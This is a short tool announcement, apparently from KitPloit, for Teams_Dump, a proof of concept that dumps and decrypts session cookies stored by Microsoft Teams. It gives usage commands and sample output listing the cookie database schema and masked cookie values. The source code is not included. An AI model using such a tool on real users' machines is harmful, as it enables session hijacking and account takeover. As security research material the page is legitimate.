Teams_Dump - PoC For Dumping And Decrypting Cookies In The Latest Version Of Microsoft Teams
2023-10-30 19:30:0 Author: www.kitploit.com(查看原文) 阅读量:17 收藏

PoC for dumping and decrypting cookies in the latest version of Microsoft Teams

extract.py just dumps without arguments

extract.exe is just extract.py packed into an exe

List values in the database

python.exe .\teams_dump.py teams --list

Table: meta
Columns in meta: key, value
--------------------------------------------------
Table: cookies
Columns in cookies: creation_utc, host_key, top_frame_site_key, name, value, encrypted_value, path, expires_utc, is_secure, is_httponly, last_access_utc, has_expires, is_persistent, priority, samesite, source_scheme, source_port, is_same_party

Dump the database into a json file

python.exe .\teams_dump.py teams --get
[+] Host: teams.microsoft.com
[+] Cookie Name MUIDB
[+] Cookie Value: xxxxxxxxxxxxxx
**************************************************
[+] Host: teams.microsoft.com
[+] Cookie Name TSREGIONCOOKIE
[+] Cookie Value: xxxxxxxxxxxxxx
**************************************************

Teams_Dump - PoC For Dumping And Decrypting Cookies In The Latest Version Of Microsoft Teams Teams_Dump - PoC For Dumping And Decrypting Cookies In The Latest Version Of Microsoft Teams Reviewed by Zion3R on 8:30 AM Rating: 5


文章来源: http://www.kitploit.com/2023/10/teamsdump-poc-for-dumping-and.html
如有侵权请联系:admin#unsafe.sh